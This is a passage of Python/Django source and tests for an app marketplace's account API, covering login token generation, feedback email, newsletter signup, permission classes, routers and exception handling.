res = self.client.get(self.list_url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 2)
eq_(data['objects'][0]['id'], ins1.addon.id)
eq_(data['objects'][1]['id'], ins2.addon.id)
def not_there(self):
res = self.client.get(self.list_url)
eq_(res.status_code, 200, res.content)
data = json.loads(res.content)
eq_(data['meta']['total_count'], 0)
def test_installed_other(self):
Installed.objects.create(user_id=10482, addon_id=337141)
self.not_there()
def test_installed_reviewer(self):
Installed.objects.create(user=self.user, addon_id=337141,
install_type=INSTALL_TYPE_REVIEWER)
self.not_there()
class FakeUUID(object):
hex = '000000'
@patch.object(settings, 'SECRET_KEY', 'gubbish')
class TestLoginHandler(TestCase):
def setUp(self):
super(TestLoginHandler, self).setUp()
self.url = reverse('account-login')
self.logout_url = reverse('account-logout')
def post(self, data):
return self.client.post(self.url, json.dumps(data),
content_type='application/json')
@patch.object(uuid, 'uuid4', FakeUUID)
@patch('requests.post')
def _test_login(self, http_request):
FakeResponse = collections.namedtuple('FakeResponse',
'status_code content')
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'okay', 'email': '[email protected]'}))
res = self.post({'assertion': 'fake-assertion',
'audience': 'fakeamo.org'})
eq_(res.status_code, 201)
data = json.loads(res.content)
eq_(data['token'],
'[email protected],95c9063d9f249aacfe5697fc83192ed6480c01463e2a80b3'
'5af5ecaef11754700f4be33818d0e83a0cfc2cab365d60ba53b3c2b9f8f6589d1'
'c43e9bbb876eef0,000000')
return data
def test_login_new_user_success(self):
data = self._test_login()
ok_(not any(data['permissions'].values()))
def test_login_existing_user_success(self):
profile = UserProfile.objects.create(email='[email protected]')
self.grant_permission(profile, 'Apps:Review')
data = self._test_login()
eq_(data['permissions'],
{'admin': False,
'developer': False,
'localizer': False,
'lookup': False,
'curator': False,
'reviewer': True,
'webpay': False,
'stats': False,
'revenue_stats': False})
eq_(data['apps']['installed'], [])
eq_(data['apps']['purchased'], [])
eq_(data['apps']['developed'], [])
@patch('users.models.UserProfile.purchase_ids')
def test_relevant_apps(self, purchase_ids):
profile = UserProfile.objects.create(email='[email protected]')
purchased_app = app_factory()
purchase_ids.return_value = [purchased_app.pk]
developed_app = app_factory()
developed_app.addonuser_set.create(user=profile)
installed_app = app_factory()
installed_app.installed.create(user=profile)
data = self._test_login()
eq_(data['apps']['installed'], [installed_app.pk])
eq_(data['apps']['purchased'], [purchased_app.pk])
eq_(data['apps']['developed'], [developed_app.pk])
@patch('requests.post')
def test_login_failure(self, http_request):
FakeResponse = collections.namedtuple('FakeResponse',
'status_code content')
http_request.return_value = FakeResponse(200, json.dumps(
{'status': 'busted'}))
res = self.post({'assertion': 'fake-assertion',
'audience': 'fakeamo.org'})
eq_(res.status_code, 403)
def test_login_empty(self):
res = self.post({})
data = json.loads(res.content)
eq_(res.status_code, 400)
assert 'assertion' in data
assert not 'apps' in data
def test_logout(self):
profile = UserProfile.objects.create(email='[email protected]')
data = self._test_login()
r = self.client.delete(
urlparams(self.logout_url, _user=data['token']),
content_type='application/json')
eq_(r.status_code, 204)
class TestFeedbackHandler(TestPotatoCaptcha, RestOAuth):
def setUp(self):
super(TestFeedbackHandler, self).setUp()
self.url = reverse('account-feedback')
self.user = UserProfile.objects.get(pk=2519)
self.default_data = {
'chromeless': 'no',
'feedback': u'Hér€ is whàt I rælly think.',
'platform': u'Desktøp',
'from_url': '/feedback',
'sprout': 'potato'
}
self.headers = {
'HTTP_USER_AGENT': 'Fiiia-fox',
'REMOTE_ADDR': '48.151.623.42'
}
def _call(self, anonymous=False, data=None):
post_data = self.default_data.copy()
client = self.anon if anonymous else self.client
if data:
post_data.update(data)
res = client.post(self.url, data=json.dumps(post_data),
**self.headers)
return res, json.loads(res.content)
def _test_success(self, res, data):
eq_(201, res.status_code)
fields = self.default_data.copy()
# PotatoCaptcha field shouldn't be present in returned data.
del fields['sprout']
ok_('sprout' not in data)
# Rest of the fields should all be here.
for name in fields.keys():
eq_(fields[name], data[name])
eq_(len(mail.outbox), 1)
assert self.default_data['feedback'] in mail.outbox[0].body
assert self.headers['REMOTE_ADDR'] in mail.outbox[0].body
def test_send(self):
res, data = self._call()
self._test_success(res, data)
eq_(unicode(self.user), data['user'])
email = mail.outbox[0]
eq_(email.from_email, self.user.email)
assert self.user.username in email.body
assert self.user.name in email.body
assert unicode(self.user.pk) in email.body
assert self.user.email in email.body
def test_send_urlencode(self):
self.headers['CONTENT_TYPE'] = 'application/x-www-form-urlencoded'
post_data = self.default_data.copy()
res = self.client.post(self.url, data=urlencode(post_data),
**self.headers)
data = json.loads(res.content)
self._test_success(res, data)
eq_(unicode(self.user), data['user'])
eq_(mail.outbox[0].from_email, self.user.email)
def test_send_without_platform(self):
del self.default_data['platform']
self.url += '?dev=platfoo'
res, data = self._call()
self._test_success(res, data)
assert 'platfoo' in mail.outbox[0].body
def test_send_anonymous(self):
res, data = self._call(anonymous=True)
self._test_success(res, data)
assert not data['user']
assert 'Anonymous' in mail.outbox[0].body
eq_(settings.NOBODY_EMAIL, mail.outbox[0].from_email)
def test_send_potato(self):
tuber_res, tuber_data = self._call(data={'tuber': 'potat-toh'},
anonymous=True)
potato_res, potato_data = self._call(data={'sprout': 'potat-toh'},
anonymous=True)
self._test_bad_api_potato_data(tuber_res, tuber_data)
self._test_bad_api_potato_data(potato_res, potato_data)
def test_missing_optional_field(self):
res, data = self._call(data={'platform': None})
eq_(201, res.status_code)
def test_send_bad_data(self):
"""
One test to ensure that Feedback API is doing its validation duties.
"""
res, data = self._call(data={'feedback': None})
eq_(400, res.status_code)
assert 'feedback' in data
class TestNewsletter(RestOAuth):
def setUp(self):
super(TestNewsletter, self).setUp()
self.url = reverse('account-newsletter')
@patch('basket.subscribe')
def test_signup_bad(self, subscribe):
res = self.client.post(self.url,
data=json.dumps({'email': '!not_an_email'}))
eq_(res.status_code, 400)
ok_(not subscribe.called)
@patch('basket.subscribe')
def test_signup_empty(self, subscribe):
res = self.client.post(self.url)
eq_(res.status_code, 400)
ok_(not subscribe.called)
@patch('basket.subscribe')
def test_signup_anonymous(self, subscribe):
res = self.anon.post(self.url)
eq_(res.status_code, 403)
ok_(not subscribe.called)
@patch('basket.subscribe')
def test_signup(self, subscribe):
res = self.client.post(self.url,
data=json.dumps({'email': '[email protected]'}))
eq_(res.status_code, 204)
subscribe.assert_called_with(
'[email protected]', 'marketplace', lang='en-US',
country='restofworld', trigger_welcome='Y', optin='Y', format='H')
@patch('basket.subscribe')
def test_signup_plus(self, subscribe):
res = self.client.post(
self.url,
data=json.dumps({'email': '[email protected]'}))
subscribe.assert_called_with(
'[email protected]', 'marketplace', lang='en-US',
country='restofworld', trigger_welcome='Y', optin='Y', format='H')
eq_(res.status_code, 204)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from users import views
from mkt.account.views import (AccountView, FeedbackView, InstalledView,
LoginView, LogoutView, NewsletterView,
PermissionsView)
drf_patterns = patterns('',
url('^feedback/$', FeedbackView.as_view(), name='account-feedback'),
url('^installed/mine/$', InstalledView.as_view(), name='installed-apps'),
url('^login/$', LoginView.as_view(), name='account-login'),
url('^logout/$', LogoutView.as_view(), name='account-logout'),
url('^newsletter/$', NewsletterView.as_view(), name='account-newsletter'),
url('^permissions/(?P<pk>[^/]+)/$', PermissionsView.as_view(),
name='account-permissions'),
url('^settings/(?P<pk>[^/]+)/$', AccountView.as_view(),
name='account-settings'),
)
api_patterns = patterns('',
url('^account/', include(drf_patterns)),
)
user_patterns = patterns('',
url('^ajax$', views.ajax, name='users.ajax'),
url('^browserid-login', views.browserid_login,
name='users.browserid_login'),
)
########NEW FILE########
__FILENAME__ = utils
from django import http
from tower import ugettext_lazy as _lazy
from addons.views import BaseFilter
import amo
from amo.models import manual_order
from amo.utils import paginate
from mkt.constants import apps
from mkt.webapps.models import Webapp
from stats.models import Contribution
from translations.query import order_by_translation
class PurchasesFilter(BaseFilter):
opts = (('purchased', _lazy(u'Purchase Date')),
('price', _lazy(u'Price')),
('name', _lazy(u'Name')))
def __init__(self, *args, **kwargs):
self.ids = kwargs.pop('ids')
self.uids = kwargs.pop('uids')
super(PurchasesFilter, self).__init__(*args, **kwargs)
def filter(self, field):
qs = self.base_queryset
if field == 'purchased':
# Id's are in created order, so let's invert them for this query.
# According to my testing we don't actually need to dedupe this.
ids = list(reversed(self.ids[0])) + self.ids[1]
return manual_order(qs.filter(id__in=ids), ids)
elif field == 'price':
return (qs.filter(id__in=self.uids)
.order_by('addonpremium__price__price', 'id'))
elif field == 'name':
return order_by_translation(qs.filter(id__in=self.uids), 'name')
def purchase_list(request, user, product_id):
cs = (Contribution.objects
.filter(user=user,
type__in=[amo.CONTRIB_PURCHASE, amo.CONTRIB_REFUND,
amo.CONTRIB_CHARGEBACK])
.order_by('created'))
if product_id:
cs = cs.filter(addon__guid=product_id)
ids = list(cs.values_list('addon_id', flat=True))
product_ids = []
# If you are asking for a receipt for just one item, show only that.
# Otherwise, we'll show all apps that have a contribution or are free.
if not product_id:
product_ids = list(user.installed_set
.filter(install_type__in=
[apps.INSTALL_TYPE_USER,
apps.INSTALL_TYPE_DEVELOPER])
.exclude(addon__in=ids)
.values_list('addon_id', flat=True))
contributions = {}
for c in cs:
contributions.setdefault(c.addon_id, []).append(c)
unique_ids = set(ids + product_ids)
listing = PurchasesFilter(request, Webapp.objects.all(),
key='sort', default='purchased',
ids=[ids, product_ids],
uids=unique_ids)
if product_id and not listing.qs.exists():
# User has requested a receipt for an app he ain't got.
raise http.Http404
products = paginate(request, listing.qs, count=len(unique_ids))
return products, contributions, listing
########NEW FILE########
__FILENAME__ = views
import hashlib
import hmac
import uuid
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.signals import user_logged_in
import basket
import commonware.log
from django_browserid import get_audience
from django_statsd.clients import statsd
from rest_framework import status
from rest_framework.exceptions import AuthenticationFailed
from rest_framework.generics import (CreateAPIView, DestroyAPIView,
RetrieveAPIView, RetrieveUpdateAPIView,
ListAPIView)
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.throttling import UserRateThrottle
import amo
from amo.utils import send_mail_jinja
from users.models import UserProfile
from users.views import browserid_authenticate
from mkt.account.serializers import (AccountSerializer, FeedbackSerializer,
LoginSerializer, NewsletterSerializer,
PermissionsSerializer)
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AllowSelf, AllowOwner
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.constants.apps import INSTALL_TYPE_USER
from mkt.webapps.serializers import SimpleAppSerializer
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.account')
def user_relevant_apps(user):
return {
'developed': list(user.addonuser_set.filter(
role=amo.AUTHOR_ROLE_OWNER).values_list('addon_id', flat=True)),
'installed': list(user.installed_set.values_list('addon_id',
flat=True)),
'purchased': list(user.purchase_ids()),
}
class MineMixin(object):
def get_object(self, queryset=None):
pk = self.kwargs.get('pk')
if pk == 'mine':
self.kwargs['pk'] = self.request.amo_user.pk
return super(MineMixin, self).get_object(queryset)
class InstalledView(CORSMixin, MarketplaceView, ListAPIView):
cors_allowed_methods = ['get']
serializer_class = SimpleAppSerializer
permission_classes = [AllowSelf]
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
def get_queryset(self):
return Webapp.objects.no_cache().filter(
installed__user=self.request.amo_user,
installed__install_type=INSTALL_TYPE_USER).order_by(
'-installed__created')
class CreateAPIViewWithoutModel(CreateAPIView):
"""
A base class for APIs that need to support a create-like action, but
without being tied to a Django Model.
"""
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
cors_allowed_methods = ['post']
permission_classes = (AllowAny,)
def response_success(self, request, serializer, data=None):
if data is None:
data = serializer.data
return Response(data, status=status.HTTP_201_CREATED)
def response_error(self, request, serializer):
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.DATA)
if serializer.is_valid():
data = self.create_action(request, serializer)
return self.response_success(request, serializer, data=data)
return self.response_error(request, serializer)
class AccountView(MineMixin, CORSMixin, RetrieveUpdateAPIView):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
cors_allowed_methods = ['get', 'patch', 'put']
model = UserProfile
permission_classes = (AllowOwner,)
serializer_class = AccountSerializer
class FeedbackView(CORSMixin, CreateAPIViewWithoutModel):
class FeedbackThrottle(UserRateThrottle):
THROTTLE_RATES = {
'user': '30/hour',
}
serializer_class = FeedbackSerializer
throttle_classes = (FeedbackThrottle,)
throttle_scope = 'user'
def create_action(self, request, serializer):
context_data = self.get_context_data(request, serializer)
self.send_email(request, context_data)
def send_email(self, request, context_data):
sender = getattr(request.amo_user, 'email', settings.NOBODY_EMAIL)
send_mail_jinja(u'Marketplace Feedback', 'account/email/feedback.txt',
context_data, from_email=sender,
recipient_list=[settings.MKT_FEEDBACK_EMAIL])
def get_context_data(self, request, serializer):
context_data = {
'user_agent': request.META.get('HTTP_USER_AGENT', ''),
'ip_address': request.META.get('REMOTE_ADDR', '')
}
context_data.update(serializer.data)
context_data['user'] = request.amo_user
return context_data
class LoginView(CORSMixin, CreateAPIViewWithoutModel):
authentication_classes = []
serializer_class = LoginSerializer
def get_token(self, email):
unique_id = uuid.uuid4().hex
consumer_id = hashlib.sha1(
email + settings.SECRET_KEY).hexdigest()
hm = hmac.new(
unique_id + settings.SECRET_KEY,
consumer_id, hashlib.sha512)
return ','.join((email, hm.hexdigest(), unique_id))
def create_action(self, request, serializer):
with statsd.timer('auth.browserid.verify'):
profile, msg = browserid_authenticate(
request, serializer.data['assertion'],
browserid_audience=serializer.data['audience'] or
get_audience(request),
is_mobile=serializer.data['is_mobile'],
)
if profile is None:
# Authentication failure.
log.info('No profile: %s' % (msg or ''))
raise AuthenticationFailed('No profile.')
request.user, request.amo_user = profile, profile
request.groups = profile.groups.all()
auth.login(request, profile)
profile.log_login_attempt(True) # TODO: move this to the signal.
user_logged_in.send(sender=profile.__class__, request=request,
user=profile)
# We want to return completely custom data, not the serializer's.
data = {
'error': None,
'token': self.get_token(request.amo_user.email),
'settings': {
'display_name': request.amo_user.display_name,
'email': request.amo_user.email,
}
}
# Serializers give up if they aren't passed an instance, so we
# do that here despite PermissionsSerializer not needing one
# really.
permissions = PermissionsSerializer(context={'request': request},
instance=True)
data.update(permissions.data)
# Add ids of installed/purchased/developed apps.
data['apps'] = user_relevant_apps(profile)
return data
class LogoutView(CORSMixin, DestroyAPIView):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
permission_classes = (IsAuthenticated,)
cors_allowed_methods = ['delete']
def delete(self, request):
auth.logout(request)
return Response(status=status.HTTP_204_NO_CONTENT)
class NewsletterView(CORSMixin, CreateAPIViewWithoutModel):
permission_classes = (IsAuthenticated,)
serializer_class = NewsletterSerializer
def response_success(self, request, serializer, data=None):
return Response({}, status=status.HTTP_204_NO_CONTENT)
def create_action(self, request, serializer):
email = serializer.data['email']
basket.subscribe(email, 'marketplace',
format='H', country=request.REGION.slug,
lang=request.LANG, optin='Y',
trigger_welcome='Y')
class PermissionsView(CORSMixin, MineMixin, RetrieveAPIView):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
cors_allowed_methods = ['get']
permission_classes = (AllowSelf,)
model = UserProfile
serializer_class = PermissionsSerializer
########NEW FILE########
__FILENAME__ = authentication
from django.contrib.auth.models import AnonymousUser
import commonware.log
from rest_framework.authentication import BaseAuthentication
log = commonware.log.getLogger('z.api')
class OAuthError(RuntimeError):
def __init__(self, message='OAuth error occured.'):
self.message = message
class RestOAuthAuthentication(BaseAuthentication):
def authenticate(self, request):
# Most of the work here is in the RestOAuthMiddleware.
if (getattr(request._request, 'user', None) and
'RestOAuth' in getattr(request._request, 'authed_from', [])):
request.user = request._request.user
return request.user, None
class RestSharedSecretAuthentication(BaseAuthentication):
def authenticate(self, request):
# Most of the work here is in the RestSharedSecretMiddleware.
if (getattr(request._request, 'user', None) and
'RestSharedSecret' in getattr(
request._request, 'authed_from', [])):
request.user = request._request.user
return request.user, None
class RestAnonymousAuthentication(BaseAuthentication):
def authenticate(self, request):
return AnonymousUser(), None
########NEW FILE########
__FILENAME__ = authorization
from collections import defaultdict
import commonware.log
from rest_framework.permissions import BasePermission, SAFE_METHODS
from waffle import flag_is_active, switch_is_active
from access import acl
log = commonware.log.getLogger('z.api')
class AnyOf(BasePermission):
"""
Takes multiple permission objects and succeeds if any single one does.
"""
def __init__(self, *perms):
# DRF calls the items in permission_classes, might as well do
# it here too.
self.perms = [p() for p in perms]
def has_permission(self, request, view):
return any(perm.has_permission(request, view) for perm in self.perms)
def has_object_permission(self, request, view, obj):
# This method must call `has_permission` for each
# sub-permission since the default implementation of
# `has_object_permission` returns True unconditionally, and
# some permission objects might not override it.
return any((perm.has_permission(request, view) and
perm.has_object_permission(request, view, obj))
for perm in self.perms)
def __call__(self):
return self
class AllowSelf(BasePermission):
"""
Permission class to use when you are dealing with UserProfile models and
you want only the corresponding user to be able to access his UserProfile
instance.
"""
def has_permission(self, request, view):
return request.user.is_authenticated()
def has_object_permission(self, request, view, obj):
try:
return obj.pk == request.amo_user.pk
# Appropriately handles AnonymousUsers when `amo_user` is None.
except AttributeError:
return False
class AllowNone(BasePermission):
def has_permission(self, request, view):
return False
def has_object_permission(self, request, view, obj):
return False
class AllowOwner(BasePermission):
"""
Permission class to use when you are dealing with a model instance that has
a "user" FK pointing to an UserProfile, and you want only the corresponding
user to be able to access your instance.
Do not use with models pointing to an User! There is no guarantee that the
pk is the same between a User and an UserProfile instance.
"""
def has_permission(self, request, view):
return request.user.is_authenticated()
def has_object_permission(self, request, view, obj):
return ((obj == request.amo_user) or
(getattr(obj, 'user', None) == request.amo_user))
class AllowAppOwner(BasePermission):
def has_permission(self, request, view):
return not request.user.is_anonymous()
def has_object_permission(self, request, view, obj):
try:
return obj.authors.filter(pk=request.amo_user.pk).exists()
# Appropriately handles AnonymousUsers when `amo_user` is None.
except AttributeError:
return False
class AllowRelatedAppOwner(BasePermission):
def has_permission(self, request, view):
return not request.user.is_anonymous()
def has_object_permission(self, request, view, obj):
return AllowAppOwner().has_object_permission(request, view, obj.addon)
class AllowReviewerReadOnly(BasePermission):
def has_permission(self, request, view):
return request.method in SAFE_METHODS and acl.action_allowed(
request, 'Apps', 'Review')
def has_object_permission(self, request, view, object):
return self.has_permission(request, view)
class AllowAuthor(BasePermission):
"""Allow any user that is included in the `view.get_authors()` queryset of
authors."""
def has_permission(self, request, view):
user_pk = getattr(request.amo_user, 'pk', False)
return user_pk and view.get_authors().filter(pk=user_pk).exists()
class AllowReadOnly(BasePermission):
"""
The request does not modify the resource.
"""
def has_permission(self, request, view):
return request.method in SAFE_METHODS
def has_object_permission(self, request, view, object):
return request.method in SAFE_METHODS
class AllowReadOnlyIfPublic(BasePermission):
"""
The request does not modify the resource, and it's explicitly marked as
public, by answering True to obj.is_public().
"""
def has_permission(self, request, view):
return request.method in SAFE_METHODS
def has_object_permission(self, request, view, object):
return object.is_public() and self.has_permission(request, view)
def flag(name):
return type('FlagPermission', (WafflePermission,),
{'type': 'flag', 'name': name})
def switch(name):
return type('SwitchPermission', (WafflePermission,),
{'type': 'switch', 'name': name})
class WafflePermission(BasePermission):
def has_permission(self, request, view):
if self.type == 'flag':
return flag_is_active(request, self.name)
elif self.type == 'switch':
return switch_is_active(self.name)
raise NotImplementedError
def has_object_permission(self, request, view, obj):
return self.has_permission(request, view)
class GroupPermission(BasePermission):
def __init__(self, app, action):
self.app = app
self.action = action
def has_permission(self, request, view):
return acl.action_allowed(request, self.app, self.action)
def has_object_permission(self, request, view, obj):
return self.has_permission(request, view)
def __call__(self, *a):
"""
ignore DRF's nonsensical need to call this object.
"""
return self
class ByHttpMethod(BasePermission):
"""
Permission class allowing you to define different Permissions depending on
the HTTP method used.
method_permission is a dict with the lowercase http method names as keys,
permission classes (not instantiated, like DRF expects them) as values.
Careful, you probably want to define AllowAny for 'options' if you are
using a CORS-enabled endpoint.
"""
def __init__(self, method_permissions, default=None):
if default is None:
default = AllowNone()
self.method_permissions = defaultdict(lambda: default)
for method, perm in method_permissions.items():
# Initialize the permissions by calling them like DRF does.
self.method_permissions[method] = perm()
def has_permission(self, request, view):
perm = self.method_permissions[request.method.lower()]
return perm.has_permission(request, view)
def has_object_permission(self, request, view, obj):
perm = self.method_permissions[request.method.lower()]
return perm.has_object_permission(request, view, obj)
def __call__(self):
return self
########NEW FILE########
__FILENAME__ = base
import functools
import json
from django.db.models.sql import EmptyResultSet
import commonware.log
from rest_framework.decorators import api_view
from rest_framework.exceptions import ParseError
from rest_framework.mixins import ListModelMixin
from rest_framework.routers import Route, SimpleRouter
from rest_framework.response import Response
from rest_framework.urlpatterns import format_suffix_patterns
import mkt
log = commonware.log.getLogger('z.api')
def list_url(name, **kw):
kw['resource_name'] = name
return ('api_dispatch_list', kw)
def get_url(name, pk, **kw):
kw.update({'resource_name': name, 'pk': pk})
return ('api_dispatch_detail', kw)
def _collect_form_errors(forms):
errors = {}
if not isinstance(forms, list):
forms = [forms]
for f in forms:
# If we've got form objects, get the error object off it.
# Otherwise assume we've just been passed a form object.
form_errors = getattr(f, 'errors', f)
if isinstance(form_errors, list): # Cope with formsets.
for e in form_errors:
errors.update(e)
continue
errors.update(dict(form_errors.items()))
return errors
def form_errors(forms):
errors = _collect_form_errors(forms)
raise ParseError(errors)
def check_potatocaptcha(data):
if data.get('tuber', False):
return Response(json.dumps({'tuber': 'Invalid value'}), 400)
if data.get('sprout', None) != 'potato':
return Response(json.dumps({'sprout': 'Invalid value'}), 400)
class SubRouter(SimpleRouter):
"""
Like SimpleRouter, but with the lookup before the prefix, so that it can be
easily used for sub-actions that are children of a main router.
This is a convenient way of linking one or more viewsets to a parent one
without having to set multiple @action and @link manually.
"""
routes = [
# List route.
Route(
url=r'^{lookup}/{prefix}{trailing_slash}$',
mapping={
'get': 'list',
'post': 'create'
},
name='{basename}-list',
initkwargs={'suffix': 'List'}
),
# Detail route.
Route(
url=r'^{lookup}/{prefix}{trailing_slash}$',
mapping={
'get': 'retrieve',
'put': 'update',
'post': 'detail_post',
'patch': 'partial_update',
'delete': 'destroy'
},
name='{basename}-detail',
initkwargs={'suffix': 'Instance'}
)
]
class SubRouterWithFormat(SubRouter):
"""
SubRouter that also adds the optional format to generated URL patterns.
This is similar to DRF's DefaultRouter, except it's a SubRouter and we
don't respect the trailing_slash parameter with the URLs containing the
format parameter, because that'd make ugly, weird URLs.
"""
def get_urls(self):
# Keep trailing slash value...
trailing_slash = self.trailing_slash
# Generate base URLs without format.
base_urls = super(SubRouterWithFormat, self).get_urls()
# Generate the same URLs, but forcing to omit the trailing_slash.
self.trailing_slash = ''
extra_urls = super(SubRouterWithFormat, self).get_urls()
# Reset trailing slash and add format to our extra URLs.
self.trailing_slash = trailing_slash
extra_urls = format_suffix_patterns(extra_urls, suffix_required=True)
# Return the addition of both lists of URLs.
return base_urls + extra_urls
class MarketplaceView(object):
"""
Base view for DRF views.
It includes:
- An implementation of handle_exception() that goes with our custom
exception handler. It stores the request and originating class in the
exception before it's handed over the the handler, so that the handler
can in turn properly propagate the got_request_exception signal if
necessary.
- A implementation of paginate_queryset() that goes with our custom
pagination handler. It does tastypie-like offset pagination instead of
the default page mechanism.
"""
def handle_exception(self, exc):
exc._request = self.request._request
exc._klass = self.__class__
return super(MarketplaceView, self).handle_exception(exc)
def paginate_queryset(self, queryset, page_size=None):
page_query_param = self.request.QUERY_PARAMS.get(self.page_kwarg)
offset_query_param = self.request.QUERY_PARAMS.get('offset')
# If 'offset' (tastypie-style pagination) parameter is present and
# 'page' isn't, use offset it to find which page to use.
if page_query_param is None and offset_query_param is not None:
page_number = int(offset_query_param) / self.get_paginate_by() + 1
self.kwargs[self.page_kwarg] = page_number
return super(MarketplaceView, self).paginate_queryset(queryset,
page_size=page_size)
def get_region_from_request(self, request):
"""
Returns the REGION object for the passed request. If the GET param
`region` is `'None'`, return `None`. Otherwise, return `request.REGION`
which will have been set by the RegionMiddleware. If somehow we didn't
go through the middleware and request.REGION is absent, we fall back to
RESTOFWORLD.
"""
region = request.GET.get('region')
if region and region == 'None':
return None
return getattr(request, 'REGION', mkt.regions.RESTOFWORLD)
class CORSMixin(object):
"""
Mixin to enable CORS for DRF API.
"""
def finalize_response(self, request, response, *args, **kwargs):
if not hasattr(request._request, 'CORS'):
request._request.CORS = self.cors_allowed_methods
return super(CORSMixin, self).finalize_response(
request, response, *args, **kwargs)
def cors_api_view(methods):
def decorator(f):
@api_view(methods)
@functools.wraps(f)
def wrapped(request):
request._request.CORS = methods
return f(request)
return wrapped
return decorator
class SlugOrIdMixin(object):
"""
Mixin that allows you to pass slugs instead of pk in your URLs. Use with
any router or urlpattern that relies on a relaxed regexp for pks, like
(?P<pk>[^/]+) (DRF does this by default).
If the name of your `slug` is called something else, override
`self.slug_field`.
"""
def get_object(self, queryset=None):
pk = self.kwargs.get('pk')
if pk and not pk.isdigit():
# If the `pk` contains anything other than a digit, it's a `slug`.
self.kwargs.update(pk=None, slug=self.kwargs['pk'])
return super(SlugOrIdMixin, self).get_object(queryset=queryset)
class SilentListModelMixin(ListModelMixin):
"""
DRF's ListModelMixin that returns a 204_NO_CONTENT rather than flipping a
500 or 404.
"""
def list(self, *args, **kwargs):
try:
res = super(SilentListModelMixin, self).list(*args, **kwargs)
except EmptyResultSet:
return Response([])
if res.status_code == 404:
return Response([])
return res
########NEW FILE########
__FILENAME__ = exceptions
from django.conf import settings
from django.core.signals import got_request_exception
from rest_framework import status
from rest_framework.exceptions import APIException
from rest_framework.response import Response
from rest_framework.views import exception_handler
class AlreadyPurchased(Exception):
pass
class Conflict(APIException):
status_code = status.HTTP_409_CONFLICT
default_detail = 'Conflict detected.'
def __init__(self, detail=None):
self.detail = detail or self.default_detail
class NotImplemented(APIException):
status_code = status.HTTP_501_NOT_IMPLEMENTED
default_detail = 'API not implemented.'
def __init__(self, detail=None):
self.detail = detail or self.default_detail
class ServiceUnavailable(APIException):
status_code = status.HTTP_503_SERVICE_UNAVAILABLE
default_detail = 'Service unavailable at this time.'
def __init__(self, detail=None):
self.detail = detail or self.default_detail
def custom_exception_handler(exc):
"""
Custom exception handler for DRF, which doesn't provide one for HTTP
responses like tastypie does.
"""
# If propagate is true, bail early.
if settings.DEBUG_PROPAGATE_EXCEPTIONS:
raise
# Call REST framework's default exception handler first,
# to get the standard error response.
response = exception_handler(exc)
# If the response is None, then DRF didn't handle the exception and we
# should do it ourselves.
if response is None:
# Start with a generic default error message.
data = {"detail": "Internal Server Error"}
# Include traceback if API_SHOW_TRACEBACKS is active.
if getattr(settings, 'API_SHOW_TRACEBACKS', settings.DEBUG):
import traceback
import sys
data['error_message'] = unicode(exc)
data['traceback'] = '\n'.join(
traceback.format_exception(*(sys.exc_info())))
request = getattr(exc, '_request', None)
klass = getattr(exc, '_klass', None)
# Send the signal so other apps are aware of the exception.
got_request_exception.send(klass, request=request)
# Send the 500 response back.
response = Response(data, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
return response
class HttpLegallyUnavailable(APIException):
status_code = 451
default_detail = 'Legally unavailable.'
def __init__(self, detail=None):
self.detail = detail or self.default_detail
########NEW FILE########
__FILENAME__ = fields
from django.conf import settings
from django.core import validators
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db.models.fields import BLANK_CHOICE_DASH
from django.utils.translation import ugettext_lazy as _
from rest_framework import fields, serializers
from rest_framework.compat import smart_text
from amo.utils import to_language
class MultiSlugChoiceField(fields.WritableField):
"""
Like SlugChoiceField but accepts a list of values rather a single one.
"""
type_name = 'MultiSlugChoiceField'
type_label = 'multiple choice'
default_error_messages = {
'invalid_choice': _('Select a valid choice. %(value)s is not one of '
'the available choices.'),
}
def __init__(self, choices_dict=None, *args, **kwargs):
super(MultiSlugChoiceField, self).__init__(*args, **kwargs)
# Create a choice dynamically to allow None, slugs and ids. Also store
# choices_dict and ids_choices_dict to re-use them later in to_native()
# and from_native().
self.choices_dict = choices_dict
slugs_choices = self.choices_dict.items()
ids_choices = [(v.id, v) for v in self.choices_dict.values()]
self.ids_choices_dict = dict(ids_choices)
self.choices = slugs_choices + ids_choices
if not self.required:
self.choices = BLANK_CHOICE_DASH + self.choices
def validate(self, value):
"""
Validates that the input is in self.choices.
"""
super(MultiSlugChoiceField, self).validate(value)
for v in value:
if not self.valid_value(v):
raise ValidationError(self.error_messages['invalid_choice'] % {
'value': v})
def valid_value(self, value):
"""
Check to see if the provided value is a valid choice.
"""
for k, v in self.choices:
if isinstance(v, (list, tuple)):
# This is an optgroup, so look inside the group for options
for k2, v2 in v:
if value == smart_text(k2):
return True
else:
if value == smart_text(k) or value == k:
return True
return False
def from_native(self, value):
if value in validators.EMPTY_VALUES:
return None
return super(MultiSlugChoiceField, self).from_native(value)
class TranslationSerializerField(fields.WritableField):
"""
Django-rest-framework custom serializer field for our TranslatedFields.
- When deserializing, in `from_native`, it accepts both a string or a
dictionary. If a string is given, it'll be considered to be in the
default language.
- When serializing, its behavior depends on the parent's serializer context:
If a request was included, and its method is 'GET', and a 'lang' parameter
was passed, then only returns one translation (letting the TranslatedField
figure out automatically which language to use).
Else, just returns a dict with all translations for the given `field_name`
on `obj`, with languages as the keys.
"""
default_error_messages = {
'min_length': _('The field must have a length of at least {num} '
'characters.'),
}
def __init__(self, *args, **kwargs):
self.min_length = kwargs.pop('min_length', None)
super(TranslationSerializerField, self).__init__(*args, **kwargs)
# Default to return all translations for each field.
self.requested_language = None
def initialize(self, parent, field_name):
